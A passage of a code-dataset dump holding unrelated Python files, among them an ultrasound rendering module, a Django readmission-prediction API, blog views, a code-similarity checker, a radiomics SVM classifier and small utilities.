(train_scores,test_scores)\nanswer_six()","repo_name":"manoj279/Machinelearning","sub_path":"Machinelearning/ass-2.py","file_name":"ass-2.py","file_ext":"py","file_size_in_byte":4781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"73212359605","text":"import os\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport torch\n\nnp.set_printoptions(threshold=10_0000)\n\n\ndef gaussian_kernel(size: int, mean: float, std: float):\n delta_t = 1\n x_cos = np.array(list(range(-size, size+1)), dtype=np.float32)\n x_cos *= delta_t\n\n d1 = torch.distributions.Normal(mean, std*3)\n d2 = torch.distributions.Normal(mean, std)\n vals_x = d1.log_prob(torch.arange(-size, size+1, dtype=torch.float32)*delta_t).exp()\n vals_y = d2.log_prob(torch.arange(-size, size+1, dtype=torch.float32)*delta_t).exp()\n\n gauss_kernel = torch.einsum('i,j->ij', vals_x, vals_y)\n \n return gauss_kernel / torch.sum(gauss_kernel).reshape(1, 1)\n\n\ng_kernel = gaussian_kernel(3, 0., 1.)\n# g_kernel = torch.tensor(g_kernel[:, :, None, None], dtype=torch.float32)\ng_kernel = torch.tensor(g_kernel[None, None, :, :], dtype=torch.float32).to(device='cuda')\nprint(g_kernel)\n\n\n\ndef rendering(H, W, z_vals=None, attenuation_medium_map=None, refl_map=None,\nboundary_map=None, mu_0_map=None, mu_1_map=None, sigma_0_map=None):\n\n dists = torch.abs(z_vals[..., :-1, None] - z_vals[..., 1:, None]) # dists.shape=(W, H-1, 1)\n dists = dists.squeeze(-1) # dists.shape=(W, H-1)\n dists = torch.cat([dists, dists[:, -1, None]], dim=-1) # dists.shape=(W, H)\n\n attenuation = torch.exp(-attenuation_medium_map * dists)\n attenuation_total = torch.cumprod(attenuation, dim=1, dtype=torch.float32, out=None)\n\n attenuation_total = (attenuation_total - torch.min(attenuation_total)) / (torch.max(attenuation_total) - torch.min(attenuation_total))\n\n reflection_total = torch.cumprod(1. - refl_map * boundary_map, dim=1, dtype=torch.float32, out=None)\n reflection_total = reflection_total.squeeze(-1)\n reflection_total_plot = torch.log(reflection_total + torch.finfo(torch.float32).eps)\n\n texture_noise = torch.randn(W, H, dtype=torch.float32).to(device='cuda')\n scattering_probability = torch.randn(W, H, dtype=torch.float32).to(device='cuda')\n\n scattering_zero = torch.zeros(W, H, dtype=torch.float32).to(device='cuda')\n scatterers_map = torch.where(scattering_probability <= mu_0_map, \n texture_noise * sigma_0_map + mu_1_map, \n scattering_zero)\n\n psf_scatter_conv = torch.nn.functional.conv2d(input=scatterers_map[None, None, :, :], weight=g_kernel, stride=1, padding=\"same\")\n\n # psf_scatter_conv = torch.nn.functional.conv2d(input=scatterers_map[None, :, :, None], weight=g_kernel, stride=1, padding=1)\n\n psf_scatter_conv = psf_scatter_conv.squeeze()\n\n b = attenuation_total * psf_scatter_conv\n\n border_convolution = torch.nn.functional.conv2d(input=boundary_map[None, None, :, :], weight=g_kernel, stride=1, padding=\"same\")\n border_convolution = border_convolution.squeeze()\n\n r = attenuation_total * reflection_total * refl_map * border_convolution\n intensity_map = b + r\n intensity_map = intensity_map.squeeze()\n intensity_map = torch.clamp(intensity_map, 0, 1)\n\n return intensity_map, attenuation_total, reflection_total_plot, scatterers_map, scattering_probability, border_convolution, texture_noise, b, r\n\n\n\ndef get_rays_us_linear(W, sw, c2w):\n t = torch.Tensor(c2w[:3, -1])\n R = torch.Tensor(c2w[:3, :3])\n i = torch.arange(W, dtype=torch.float32)\n rays_o_x = t[0] + sw * i\n rays_o_y = torch.full_like(rays_o_x, t[1])\n rays = torch.stack([rays_o_x, rays_o_y, torch.ones_like(rays_o_x) * t[2]], -1) #x,y,z\n shift = torch.matmul(R, torch.tensor([25., 27.5, 0.], dtype=torch.float32)) * 0.001 #What are these constants????\n rays_o = rays - shift\n dirs = torch.stack([torch.zeros_like(rays_o_x), torch.ones_like(rays_o_x), torch.zeros_like(rays_o_x)], -1)\n rays_d = torch.sum(dirs[..., None, :] * R, -1)\n\n return rays_o.to(device='cuda'), rays_d.to(device='cuda')\n\n\ndef render_us(W, H, rays=None, near=0., far=100. * 0.001, \n attenuation_medium_map=None, refl_map=None, boundary_map=None,\n mu_0_map=None, mu_1_map=None, sigma_0_map=None):\n \"\"\"Render rays\n\n Args:\n H: int. Height of image in pixels.\n W: int. Width of image in pixels.\n rays: array of shape [2, batch_size, 3]. Ray origin and direction for\n each example in batch.\n c2w: array of shape [3, 4]. Camera-to-world transformation matrix.\n near: float or array of shape [batch_size]. Nearest distance for a ray.\n far: float or array of shape [batch_size]. Farthest distance for a ray.\n \"\"\"\n sw = 40 * 0.001 / float(W)\n c2w = np.eye(4)[:3,:4].astype(np.float32) # identity pose matrix\n\n if c2w is not None:\n # special case to render full image\n rays_o, rays_d = get_rays_us_linear(W, sw, c2w)\n else:\n # use provided ray batch\n rays_o, rays_d = rays\n\n\n # Create ray batch\n rays_o = torch.tensor(rays_o).view(-1, 3).float()\n rays_d = torch.tensor(rays_d).view(-1, 3).float()\n near, far = near * torch.ones_like(rays_d[..., :1]), far * torch.ones_like(rays_d[..., :1])\n\n rays = torch.cat([rays_o, rays_d, near, far], dim=-1)\n\n N_rays = rays.shape[0]\n rays_o, rays_d = rays[:, 0:3], rays[:, 3:6]\n\n t_vals = torch.linspace(0., 1., H).to(device='cuda')\n\n z_vals = t_vals.unsqueeze(0).expand(N_rays, -1) * 2\n\n ret_list = rendering(H, W, z_vals, attenuation_medium_map, refl_map, boundary_map, mu_0_map, mu_1_map, sigma_0_map) \n\n return ret_list \n\n","repo_name":"mfazampour/SS_Probe_Pose_Regression","sub_path":"ultrasound_rendering.py","file_name":"ultrasound_rendering.py","file_ext":"py","file_size_in_byte":5472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"35739159110","text":"from django.http.response import (JsonResponse, HttpResponse)\nfrom rest_framework.views import APIView\nimport json\nimport pandas as pd\nimport numpy as np\nimport pickle\nfrom .settings import BASE_DIR\n\n\nclass PatientReadmission(APIView):\n trained_columns = ['age', 'num_procedures', 'num_medications',\n 'num_diagnoses', 'admission_source_id_7', 'admission_source_id_1',\n 'admission_source_id_17', 'admission_source_id_4',\n 'admission_source_id_6', 'admission_source_id_2',\n 'admission_source_id_5', 'admission_source_id_9',\n 'admission_source_id_3', 'admission_type_id_1', 'admission_type_id_3',\n 'admission_type_id_2', 'admission_type_id_6', 'admission_type_id_5',\n 'race_type3', 'race_type1', 'race_type4', 'race_type5',\n 'days_in_hospital', 'gender_Male', 'max_glu_serum_>300',\n 'max_glu_serum_None', 'max_glu_serum_Norm', 'A1Cresult_>8',\n 'A1Cresult_None', 'A1Cresult_Norm', 'metformin_No', 'metformin_Steady',\n 'metformin_Up', 'repaglinide_No', 'repaglinide_Steady',\n 'repaglinide_Up', 'glimepiride_No', 'glimepiride_Steady',\n 'glimepiride_Up', 'glipizide_No', 'glipizide_Steady', 'glipizide_Up',\n 'glyburide_No', 'glyburide_Steady', 'glyburide_Up', 'pioglitazone_No',\n 'pioglitazone_Steady', 'pioglitazone_Up', 'rosiglitazone_No',\n 'rosiglitazone_Steady', 'rosiglitazone_Up', 'acarbose_Steady',\n 'acarbose_Up', 'tolazamide_Steady', 'insulin_No', 'insulin_Steady',\n 'insulin_Up', 'glyburide.metformin_Steady', 'glyburide.metformin_Up',\n 'change_No', 'diabetesMed_Yes']\n drop_columns = ['patientID', 'AdmissionID',\n 'weight', 'payer_code', 'medical_specialty',\n 'nateglinide', 'chlorpropamide', 'tolbutamide', 'acetohexamide',\n 'miglitol', 'troglitazone', 'glipizide.metformin', 'metformin.rosiglitazone',\n 'metformin.pioglitazone', 'Target', 'istrain']\n\n def post(self, request):\n data = pd.DataFrame(request.data)\n data = self.preprocess(data)\n model = pickle.load(open(BASE_DIR + r\"\\patient_readmission_api\\prediction_models\\patient_readmission_model\",\n 'rb'))\n predicted = model.predict_proba(data)\n return JsonResponse(status=200, data={'classes': model.classes_.tolist(),\n 'predictions': predicted.tolist()})\n\n def preprocess(self, data):\n # Creating days_in_hospital column\n data['days_in_hospital'] = (pd.to_datetime(data.Discharge_date) - pd.to_datetime(\n data.Admission_date)) / np.timedelta64(1, 'D')\n data.drop(['Admission_date', 'Discharge_date'], axis=1, inplace=True)\n # Creating age column\n age = data.age.str.split(\"-\", expand=True)\n data.age = (pd.to_numeric(age[0].str.replace(\"[\", \"\")) + pd.to_numeric(age[1].str.replace(\")\", \"\"))) / 2\n # pre-processing production data as done to training data\n data.drop(self.drop_columns, axis=1, inplace=True)\n categorical_columns = data.select_dtypes(['object']).columns\n data = pd.get_dummies(data, columns=categorical_columns[categorical_columns != 'Target'],\n prefix=categorical_columns[categorical_columns != 'Target'])\n for col in self.trained_columns:\n if col not in data.columns:\n data[col] = 0\n data = data[self.trained_columns]\n return data\n","repo_name":"Madhav2/ML-Training","sub_path":"patient_readmission/patient_readmission_api/patient_readmission_api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"2130920502","text":"#_*_encoding:utf-8_*_#\nfrom django.shortcuts import render\nfrom django.views.generic import View\n\n\nfrom models import Article\n\nfrom forms import ArticleForms\n\n# Create your views here.\n\n\nclass ArticleDetailView(View):\n def get(self,request,article_id):\n article=Article.objects.get(id=article_id)\n\n #找到上下两篇文章\n try:\n left_article=Article.objects.filter(add_time__gt=article.add_time).order_by('-add_time')[0]\n except:\n left_article=[]\n\n try:\n right_article=Article.objects.filter(add_time__lt=article.add_time).order_by('-add_time')[0]\n except:\n right_article=[]\n\n url_address=request.get_full_path()\n\n content=article.content.encode('utf-8')\n\n if article:\n return render(request,'detail.html',{\n 'article':article,\n 'article_id_again':article_id,\n 'left_article':left_article,\n 'right_article':right_article,\n 'url_address':url_address,\n 'content':content\n })\n\n\nclass AddArticleView(View):\n def get(self,request):\n return render(request,'add_article.html')\n\n def post(self, request):\n article_forms = ArticleForms(request.POST)\n if article_forms.is_valid():\n article=Article()\n title = request.POST.get('title', '')\n content = request.POST.get('content', '')\n\n article.title=title\n article.content=content\n\n article.save()\n\n return render(request,'index.html')\n\n","repo_name":"mimota1994/mimotablog","sub_path":"apps/article/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"19434590218","text":"# 对比下载代码与选手提交代码\n\nimport os\nimport re\nimport shutil\nfrom ac.pre import get_yaml\n\nconfig = get_yaml()\n\n\ndef compare():\n print('\\n正在进行比较,即将得到结果...')\n\n file = open('result.txt', 'w')\n\n data_dir = 'data'\n user_dir = 'user'\n\n cpp = re.compile(r'.cpp')\n\n user_list = os.listdir(user_dir)\n for i in range(0, len(user_list)):\n user_problem_dir = os.path.join(user_dir, user_list[i])\n problem_id = os.path.basename(user_problem_dir)\n\n user_code_list = os.listdir(user_problem_dir)\n for j in range(0, len(user_code_list)):\n user_code_dir = os.path.join(user_problem_dir, user_code_list[j])\n user_name = os.path.basename(user_code_dir)\n user_name = cpp.sub('', user_name)\n\n data_list = os.listdir(data_dir)\n for k in range(0, len(data_list)):\n data_problem_dir = os.path.join(data_dir, data_list[k])\n if os.path.basename(data_problem_dir) != problem_id:\n continue\n\n data_code_list = os.listdir(data_problem_dir)\n for l in range(0, len(data_code_list)):\n data_code_dir = os.path.join(\n data_problem_dir, data_code_list[l])\n\n f = open(data_code_dir)\n code = f.read()\n f.close()\n data_name = re.search('url:(.+?):end', code).group(1)\n\n os.system('sim_c++ -p -o re.txt ' +\n user_code_dir+' '+data_code_dir)\n f = open('re.txt')\n res = f.read()\n f.close()\n result = re.search('consists for(.+?)% of', res)\n if result == None:\n continue\n result = int(result.group(1))\n if result >= config['sim_limit']:\n file.write(user_name+' 在 #'+str(problem_id)+' 提交的代码与 ' +\n data_name+' 相似度为 '+str(result)+'%\\n')\n\n file.close()\n os.remove('re.txt')\n shutil.rmtree('data')\n shutil.rmtree('user')\n return\n","repo_name":"Llf0703/Anti-Cheating","sub_path":"ac/compare.py","file_name":"compare.py","file_ext":"py","file_size_in_byte":2222,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"76"} +{"seq_id":"39389747348","text":"import numpy as np\nimport traitlets\nfrom yt.data_objects.data_containers import YTDataContainer\nfrom yt.utilities.lib.mesh_triangulation import triangulate_mesh\n\nfrom yt_idv.opengl_support import Texture3D, VertexArray, VertexAttribute\nfrom yt_idv.scene_data.base_data import SceneData\n\n\nclass MeshData(SceneData):\n name = \"mesh\"\n data_source = traitlets.Instance(YTDataContainer)\n texture_objects = traitlets.Dict(trait=traitlets.Instance(Texture3D))\n texture_objects = traitlets.Dict(trait=traitlets.Instance(Texture3D))\n blocks = traitlets.Dict(default_value=())\n scale = traitlets.Bool(False)\n size = traitlets.CInt(-1)\n\n def get_mesh_data(self, data_source, field):\n \"\"\"\n\n This reads the mesh data into a form that can be fed in to OpenGL.\n\n \"\"\"\n\n # get mesh information\n try:\n ftype, fname = field\n mesh_id = int(ftype[-1])\n except ValueError:\n mesh_id = 0\n\n mesh = data_source.ds.index.meshes[mesh_id - 1]\n offset = mesh._index_offset\n vertices = mesh.connectivity_coords\n if hasattr(vertices, \"in_units\"):\n vertices = vertices.in_units(\"unitary\")\n indices = mesh.connectivity_indices - offset\n\n data = data_source[field]\n\n return triangulate_mesh(vertices, data, indices)\n\n def add_data(self, field):\n v, d, i = self.get_mesh_data(self.data_source, field)\n v.shape = (v.size // 3, 3)\n v = np.concatenate([v, np.ones((v.shape[0], 1))], axis=-1).astype(\"f4\")\n d.shape = (d.size, 1)\n i.shape = (i.size, 1)\n i = i.astype(\"uint32\")\n # d[:] = np.mgrid[0.0:1.0:1j*d.size].astype(\"f4\")[:,None]\n self.vertex_array.attributes.append(\n VertexAttribute(name=\"model_vertex\", data=v)\n )\n self.vertex_array.attributes.append(\n VertexAttribute(name=\"vertex_data\", data=d.astype(\"f4\"))\n )\n self.vertex_array.indices = i\n self.size = i.size\n\n @traitlets.default(\"vertex_array\")\n def _default_vertex_array(self):\n return VertexArray(name=\"mesh_info\", each=0)\n","repo_name":"yt-project/yt_idv","sub_path":"yt_idv/scene_data/mesh.py","file_name":"mesh.py","file_ext":"py","file_size_in_byte":2136,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"76"} +{"seq_id":"18827677800","text":"# log types are ( debug, info, warning, error and critical)\n# logs can be displayed on terminal or .log file\n\n# first import logging module :\nimport logging\n\n# second explore everything inside it :\n# print(dir(logging))\n\n# logging.basicConfig(filename=\"\", filemode=\"\", formatstring=\"\", datefmt=\"\")\n\nlogging.basicConfig(filename=\"firstLog.log\", filemode=\"a\", format=\"logger_name = %(name)s, time = %(asctime)s, level_name = %(levelname)s, message = %(message)s\", datefmt=\"%d %B %Y, %H:%M:%S\", level=logging.WARNING)\n\n# debug message :\nlogging.debug(\"this is DEBUG message!\") # this will not appear because system doesn't care about debug or info\nlogging.info(\"this is info message!\") # same here , system doesn't care about info\n\nlogging.warning(\"this is warning message!\")\nlogging.error(\"this is error message!\")\nlogging.critical(\"this is critical message!\")\n# all the above 3 line will output this: ( of course with different names => warning, error and critical)\n# logger_name = root, time = 20 December 2022, 13:28, level_name = CRITICAL, message = this is critical message!\n\nmy_first_logger = logging.getLogger(\"instead_of_root\")\nmy_first_logger.error(\"this is my custom error message for my first logger\")","repo_name":"shiccorama/python_references","sub_path":"how_to_log_in_python.py","file_name":"how_to_log_in_python.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"30918057733","text":"from expkit.docs.utils import mkdocs_macro\n\n\n@mkdocs_macro\ndef escape_markdown(string: any) -> str:\n result = \"\"\n string = f\"{string}\"\n for c in string:\n result += f\"\\\\{c}\"\n return result\n\n\n@mkdocs_macro\ndef markdown_anchor(string: any) -> str:\n return string.lower().replace(\".\", \"\").replace(\" \", \"-\")\n","repo_name":"0xCCF4/ExpKit","sub_path":"expkit/docs/macros/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"77"} +{"seq_id":"43814633202","text":"#!/usr/bin/python3\nimport pathlib\nimport pygubu\nimport os\nPROJECT_PATH = pathlib.Path(__file__).parent\nPROJECT_UI = PROJECT_PATH / \"migui.ui\"\nTEMPTXT = \"D:/temp.txt\"\n\nclass MiguiApp:\n def __init__(self, master=None):\n self.builder = builder = pygubu.Builder()\n builder.add_resource_path(PROJECT_PATH)\n builder.add_from_file(PROJECT_UI)\n # Main widget\n self.mainwindow = builder.get_object(\"toplevel1\", master)\n builder.connect_callbacks(self)\n\n self.taPathTutorial = builder.get_object(\"taPathTutorial\")\n self.lblDebugMsg = builder.get_object(\"lblDebugMsg\")\n\n import psutil\n if not \"Audacity.exe\" in (i.name() for i in psutil.process_iter()):\n self.lblDebugMsg.config(text = \"Audacity is not opened !!\")\n\n def run(self):\n self.mainwindow.mainloop()\n\n def batch_fix_audios(self):\n import tmptxt\n tmptxt.VIDSPATH = self.taPathTutorial.get() #.replace('\\\\','/')\n tmptxt.main()\n \n def clean_temp_txt(self):\n if os.stat(TEMPTXT).st_size == 0:\n os.remove(\"D:/temp.txt\")\n self.lblDebugMsg.config(text = \"temp.txt fue borrado\")\n else:\n self.lblDebugMsg.config(text = \"temp.txt not empty!!\")\n\n def crear_temp_txt(self):\n with open(TEMPTXT, 'w')as fp:\n pass\n self.lblDebugMsg.config(text = \"temp.txt fue creado\")\n lNombres = []\n for root, dirs, files in os.walk(self.taPathTutorial.get()):\n for filename in files:\n if os.path.splitext(filename)[1] == '.mp4':\n elpath = os.path.join(root, filename)\n if \" \" in elpath:\n self.lblDebugMsg.config(text = \"Err: space in name\")\n break\n lNombres.append(elpath)\n import tmptxt\n tmptxt.write_temptxt(lNombres)\n\nif __name__ == \"__main__\":\n app = MiguiApp()\n app.run()\n ","repo_name":"apaza610/BatchFixAudios","sub_path":"miguiapp.py","file_name":"miguiapp.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"22244031674","text":"from __future__ import annotations\n\nimport dataclasses\nimport re\nimport typing\n\nfrom pgquery.builder.actor import BuildingPayload\nfrom pgquery.builder.clause import Renderable, double_quoted\nfrom pgquery.builder.impl.column import BaseColumn, ColumnData\nfrom pgquery.builder.impl.select import Select, SelectableMixin\nfrom pgquery.builder.impl.tokens import PGToken\n\n# Pattern for converting CamelCase to snake_case\n_camel2snake_convert_pattern = pattern = re.compile(r\"(? None:\n payload.buffer << double_quoted(cls.__table_preferences__.name)\n\n @classmethod\n def select(cls, schema, **aliased_values) -> Select:\n return SelectableMixin.select(cls, schema, **aliased_values)\n\n @classmethod\n def create(cls) -> CreateTable:\n return CreateTable(table=cls)\n\n @classmethod\n def _parse_columns(cls) -> typing.Generator[ColumnData, None, None]:\n for class_var_name, class_var_value in vars(cls).items():\n if isinstance(class_var_value, BaseColumn):\n full_column_data = ColumnData(\n name=class_var_name, schema=class_var_value, table=cls\n )\n class_var_value.column_data = full_column_data\n yield full_column_data\n\n @classmethod\n def _build_table_name(cls, name: typing.Optional[str]) -> str:\n return _camel2snake_convert_pattern.sub(\n \"_\", name or cls.__name__\n ).lower()\n\n\n@dataclasses.dataclass\nclass CreateTable(Renderable):\n\n table: typing.Type[Table]\n\n def render(self, payload: BuildingPayload) -> None:\n payload.buffer << PGToken.CREATE_TABLE\n if self.table.__table_preferences__.if_not_exist:\n payload.buffer << PGToken.WHITESPACE\n payload.buffer << PGToken.IF_NOT_EXIST\n\n # Render table name\n payload.buffer << PGToken.WHITESPACE\n payload.buffer << self.table.__table_preferences__.name\n payload.buffer << PGToken.LEFT_PARENTHESIS\n\n columns_count = len(self.table.__table_columns__)\n for ind, column in enumerate(self.table.__table_columns__):\n column.render_for_table_creation(payload)\n # != Last column\n if columns_count - 1 != ind:\n payload.buffer << PGToken.COMMA\n\n payload.buffer << PGToken.RIGHT_PARENTHESIS\n","repo_name":"deknowny/pgquery","sub_path":"pgquery_old/builder/impl/table.py","file_name":"table.py","file_ext":"py","file_size_in_byte":3039,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"45598482555","text":"def solution(n):\n answer = 1\n if n==1:\n return 1\n elif n==2:\n return 2\n for i in range(1,n+1):\n answer*=i\n \n if answer>n:\n return i-1","repo_name":"SeongjinLee00/Baekjoon","sub_path":"프로그래머스/unrated/120848. 팩토리얼/팩토리얼.py","file_name":"팩토리얼.py","file_ext":"py","file_size_in_byte":187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27935307767","text":"from fastapi import APIRouter, HTTPException, Depends\nfrom app.services.users import UserService\nfrom app.dependensies import rete_limit_check\nfrom app.schemas.users import FullProfileInfo, UserProfileInfo, FullProfileInfos, CreateUserResponse\nimport logging\nfrom fastapi.responses import Response\nfrom fastapi import status\nfrom app.clients.db import DatabaseClient\n\nloger = logging.getLogger(__name__)\n\n\ndef create_user_router(database_client: DatabaseClient) -> APIRouter:\n user_router = APIRouter(\n prefix=\"/user\",\n tags=[\"users\"],\n dependencies=[Depends(rete_limit_check)]\n )\n users_service = UserService(database_client)\n\n @user_router.get(\"/dummy\")\n async def get_dummy() -> Response:\n resource = Response()\n resource.status_code=status.HTTP_204_NO_CONTENT\n return resource\n\n @user_router.get(\"/all\", response_model=FullProfileInfos)\n async def get_list_of_users_paginated(start: int = 0, limit: int = 2):\n\n users, total = await users_service.get_list_of_users_with_pagenetion(start, limit)\n formatted_users = FullProfileInfos(users = users, total = total)\n\n return formatted_users\n\n @user_router.get(\"/{user_id}\", response_model=FullProfileInfo)\n async def get_user_by_id(user_id: int):\n loger.info(\"Enter function get_user_by_id\")\n try:\n full_profile_info = await users_service.get_user_info(user_id)\n except KeyError:\n loger.error(f\"User with {user_id} does not existing\")\n raise HTTPException(status_code=404, detail={\"message\":\"User does not exists\", \"user_id\":user_id})\n return full_profile_info\n\n @user_router.patch(\"/{user_id}\", response_model=FullProfileInfo)\n async def update_user(user_id: int, user_profile_info: UserProfileInfo):\n \"\"\"\n Update some information about user\n\n :param user_id: int unique Id for updated user\n :param user_profile_info: UserProfileInfo - user's profile information\n :return: FullProfileInfo - full user's profile\n \"\"\"\n await users_service.update_profile(user_profile_info, user_id)\n full_profile_info = await users_service.get_user_info(user_id)\n return full_profile_info\n\n @user_router.put(\"/{user_id}\", response_model=CreateUserResponse)\n async def update_user(user_id: int, full_profile_info: FullProfileInfo):\n user_id = await users_service.create_update_user(full_profile_info, user_id)\n create_user_response = CreateUserResponse(user_id=user_id)\n return create_user_response\n\n @user_router.delete(\"/{user_id}\")\n async def remove_user(user_id: int):\n try:\n await users_service.delete_user_by_id(user_id)\n return None\n except KeyError:\n raise HTTPException(status_code=404, detail={\"message\":\"User does not exists\", \"user_id\":user_id})\n\n @user_router.post(\"/\", response_model=CreateUserResponse, status_code=201)\n async def post_user(full_profile_info: FullProfileInfo):\n new_user_id = await users_service.create_user(full_profile_info)\n create_user_response = CreateUserResponse(user_id=new_user_id)\n return create_user_response\n\n @user_router.on_event(\"startup\")\n async def database_connect():\n await database_client.database.connect()\n\n @user_router.on_event(\"shutdown\")\n async def database_disconnect():\n await database_client.database.disconnect()\n\n return user_router\n","repo_name":"WhieAsh/PythonTemplateProject","sub_path":"app/routes/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":3482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"33348244081","text":"# number of days in month by years\nmonth_days = [0, 31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\n\ndef is_leap(year):\n \"\"\"Returns True if leap year otherwise False.\"\"\"\n \n return year % 4 == 0 and (year % 200 != 0 or year % 400 == 0)\n\ndef days_in_month(year, month):\n \"\"\"Return number of days in that month of year.\"\"\"\n\n if not 1 <= month <= 12:\n return 'Invalid Month' \n \n if month == 2 and is_leap(year):\n return 29\n\n return month_days[month]\n\nprint(days_in_month(2021, 2))","repo_name":"iwantroca/PythonNotes","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"18758994111","text":"import pandas as pd\r\nimport numpy as np\r\nfrom sklearn.preprocessing import label_binarize, StandardScaler\r\nfrom sklearn import svm\r\nfrom sklearn.model_selection import GroupShuffleSplit\r\nfrom sklearn.metrics import roc_curve, auc\r\nfrom sklearn.multiclass import OneVsRestClassifier\r\nfrom sklearn.decomposition import PCA\r\nfrom sklearn.pipeline import make_pipeline\r\nfrom imblearn.over_sampling import SMOTE\r\nimport matplotlib.pyplot as plt\r\nfrom itertools import cycle\r\n\r\n# Read dataframe\r\ndf = pd.read_csv('./results/2D/radiomic_features_2D.csv', skipinitialspace=True, na_values='scalar', index_col=0)\r\n\r\n# Get X, y variables\r\ny = df['Grade']\r\nX = df.drop(['Grade'], axis=1)\r\n\r\n# Group: to ensure that the same case is not represented in both testing and training sets\r\ncases = X['CaseNumber']\r\ncases_group_shuffle = GroupShuffleSplit(n_splits=2, test_size=.2, random_state=0)\r\n\r\nfor train_index, test_index in cases_group_shuffle.split(X, y, cases):\r\n X_train, X_test = X.iloc[train_index], X.iloc[test_index]\r\n y_train, y_test = y[train_index], y[test_index]\r\n\r\n# Balance dataset with SMOTE\r\nX_train, y_train = SMOTE().fit_resample(X_train, y_train)\r\n\r\n# Binarize y for ovr\r\ny_train = label_binarize(y_train, classes=[0, 1, 2])\r\ny_test = label_binarize(y_test, classes=[0, 1, 2])\r\nn_classes = y_train.shape[1]\r\n\r\n# Remove CaseNumber from X\r\nX_train = X_train.drop(['CaseNumber'], axis=1)\r\nX_test = X_test.drop(['CaseNumber'], axis=1)\r\n\r\n# Build pipeline with StandardScaler, PCA and Ovr classifier and compute score\r\nclf = make_pipeline(\r\n StandardScaler(), \r\n PCA(n_components=18), \r\n OneVsRestClassifier(svm.SVC(kernel='linear'))\r\n )\r\ny_score = clf.fit(X_train, y_train).decision_function(X_test)\r\n\r\n# Compute ROC curve and ROC area for each class\r\nfpr = dict()\r\ntpr = dict()\r\nroc_auc = dict()\r\nfor i in range(n_classes):\r\n fpr[i], tpr[i], _ = roc_curve(y_test[:, i], y_score[:, i])\r\n roc_auc[i] = auc(fpr[i], tpr[i])\r\n\r\n# Compute micro-average ROC curve and ROC area\r\nfpr[\"micro\"], tpr[\"micro\"], _ = roc_curve(y_test.ravel(), y_score.ravel())\r\nroc_auc[\"micro\"] = auc(fpr[\"micro\"], tpr[\"micro\"])\r\n\r\nlw = 2\r\n\r\n## ROC curves for the multilabel problem\r\n# First aggregate all false positive rates\r\nall_fpr = np.unique(np.concatenate([fpr[i] for i in range(n_classes)]))\r\n\r\n# Then interpolate all ROC curves at this points\r\nmean_tpr = np.zeros_like(all_fpr)\r\nfor i in range(n_classes):\r\n mean_tpr += np.interp(all_fpr, fpr[i], tpr[i])\r\n\r\n# Finally average it and compute AUC\r\nmean_tpr /= n_classes\r\n\r\nfpr[\"macro\"] = all_fpr\r\ntpr[\"macro\"] = mean_tpr\r\nroc_auc[\"macro\"] = auc(fpr[\"macro\"], tpr[\"macro\"])\r\n\r\n# Plot all ROC curves\r\nplt.figure()\r\nplt.plot(fpr[\"micro\"], tpr[\"micro\"], label='micro-average ROC curve (area = {0:0.2f})'''.format(roc_auc[\"micro\"]),color='deeppink', linestyle=':', linewidth=4)\r\nplt.plot(fpr[\"macro\"], tpr[\"macro\"],label='macro-average ROC curve (area = {0:0.2f})'''.format(roc_auc[\"macro\"]),color='navy', linestyle=':', linewidth=4)\r\ncolors = cycle(['aqua', 'darkorange', 'cornflowerblue'])\r\n\r\nfor i, color in zip(range(n_classes), colors):\r\n plt.plot(fpr[i], tpr[i], color=color, lw=lw,label='ROC curve of class {0} (area = {1:0.2f})'''.format(i, roc_auc[i]))\r\n\r\nplt.plot([0, 1], [0, 1], 'k--', lw=lw)\r\nplt.xlim([0.0, 1.0])\r\nplt.ylim([0.0, 1.05])\r\nplt.xlabel('False Positive Rate')\r\nplt.ylabel('True Positive Rate')\r\nplt.title('Slice Features')\r\nplt.legend(loc=\"lower right\")\r\nplt.show()\r\n","repo_name":"brumendes/radiomics","sub_path":"classifier_ovr_slices.py","file_name":"classifier_ovr_slices.py","file_ext":"py","file_size_in_byte":3446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29435969953","text":"'''\nImplements the template mechanism used for translating templates to\nthe corresponding output documents.\n'''\n\nimport importlib\nimport os\nimport os.path\n\nfrom bibPublish.entry import Entry\n\nTEMPLATE_PATH = 'bibPublish.templates.'\n\n\nclass Template():\n\n def __init__(self, template_name, bibtex_entries, output_dir):\n self.template = importlib.import_module(TEMPLATE_PATH + template_name)\n self.bibtex_entries = bibtex_entries\n\n # setup output infrastructure\n self.output_dir = output_dir\n if not os.path.exists(self.output_dir):\n os.makedirs(self.output_dir)\n\n # setup infrastructure for supplemental material\n self.supplemental_material = self.template.SupplementalMaterial(\n output_dir)\n\n def _load_template(self, section, template_type):\n return open(os.path.join(self.template.TEMPLATE_PATH,\n section + template_type)).read()\n\n def _get_relevant_entries(self, section):\n return sorted([entry for entry in self.bibtex_entries\n if entry['ENTRYTYPE'] == 